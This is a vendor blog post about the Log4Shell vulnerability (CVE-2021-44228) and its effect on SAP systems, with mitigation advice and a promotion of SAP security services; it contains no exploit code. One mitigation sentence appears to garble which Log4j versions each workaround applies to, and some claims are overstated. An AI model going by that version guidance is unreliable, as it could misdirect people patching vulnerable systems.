Log4j Vulnerability and SAP (CVE-2021-44228)
A few days ago, on December 10th, 2021, Germany’s Federal Office for Information Security (BSI) has upgraded the cyber security warning for the critical security flaw in the widely used open-source Java logging library, Log4j, to warning level red. A lot has happened in the last few days. The affected module Apache Log4j is a logging tool used to ensure that log files are written or interpreted in Java-based applications. The “resolutions” used in this process (i.e., lookups via JDNI API) enable an attacker who can control log message parameters to execute arbitrary code which is loaded, e.g., from an Evil LDAP server.
The security gap, now known as Log4Shell, allows attackers to execute arbitrary code on remote servers to the point of a remote shell access, which makes it possible to access the compromised system. This also enables further attacks on internal systems.
The vulnerability CVE-2021-44228 is used in practically every Java-based application and is currently actively exploited. The risk according to the Common Vulnerability Scoring System (CVSSv3) was rated 10/10.
SAP applications and application servers (on-premise & cloud) are also affected by this vulnerability. Software developers, such as SAP, have already published a statement on the extent to which their systems have been affected and have offered appropriate patches. Here is a list of affected SAP applications, which SAP is constantly expanding. It shows which applications are currently not affected, where patches have already been implemented by SAP and where patches are still missing. This shows that SAP was able to act quickly, especially in the case of cloud products.
To avoid this and to secure your code against this vulnerability, it is recommended to upgrade your log4j library to a newer version, for example from version log4j 2.16.0 the vulnerable lookups are disabled by default. This vulnerability can be mitigated by setting “the log4j2.formatMsgNoLookups” parameter to “true” or by removing the class JndiLookup from the Java Classpath, which is not possible with versions log4j > 2.9. Based on current knowledge, all versions from 2.x to 2.14x are affected.
Of course, it is difficult to assess the exact impact of this vulnerability on companies using SAP, but this situation reveals once again that companies which have implemented adequate basic security measures won’t lose sleep over this issue. However, many companies using SAP often lack the implementation of rudimentary security measures for several reasons, such as time, costs or lack of knowledge.
Many attacks that occur on the network level via compromised hosts, possibly directly from the intranet, can be prevented with measures such as network segmentation or micro-segmentation as well as correctly configured firewalls. Finally, the attacked system must be able to establish an outbound connection to the attacker’s LDAP server, which should not be possible per se. It becomes apparent that basic network security and a clean zone concept can be of great help here.
These measures in combination with a token-based login to the SAP system (SSO), properly authorized SAP roles, RFC interfaces and security monitoring of your SAP landscape already offer solid protection against many potential attacks. Such monitoring should also recognize whether the SAP message server and the ACLs of the SAP gateways have been properly configured, whether the internal server communication has been secured in accordance with SAP Note 2040644 or whether TLS and SNC encryption has been implemented in the company, and much more.
What you can do
Xiting is a highly specialized SAP solution provider with an extensive service portfolio in the SAP security area. In the light of current events, we asked ourselves what practical solutions we can offer our customers and interested parties. The Security Architect module, integrated in the Xiting Authorizations Management Suite (XAMS), assists in this matter and can also be used in combination as a monitoring tool in the SIEM environment.
In addition, it is important to activate existing mechanisms, such as security encryption and other methods that are available in the SAP system. To this end, over the past few years, we have acquired enormous know-how together with our security experts.
If you are in doubt or have any questions regarding further security measures, talk to us. Based on an extensive system check, we are able to provide you with valuable information on how to increase your security and protection against all future attacks.
Find out more about our services here:
- Secure interfaces
- Security check of your SAP systems
- Security Support
- Explained! #1: SAP IAS Proxy Mode and ID-Federation - 6. March 2023
- Connecting SAP Identity Authentication Service as a proxy to Azure AD using OpenID Connect | Xiting E-Book - 15. December 2022
- Success Story: Vetropack Group - 27. June 2022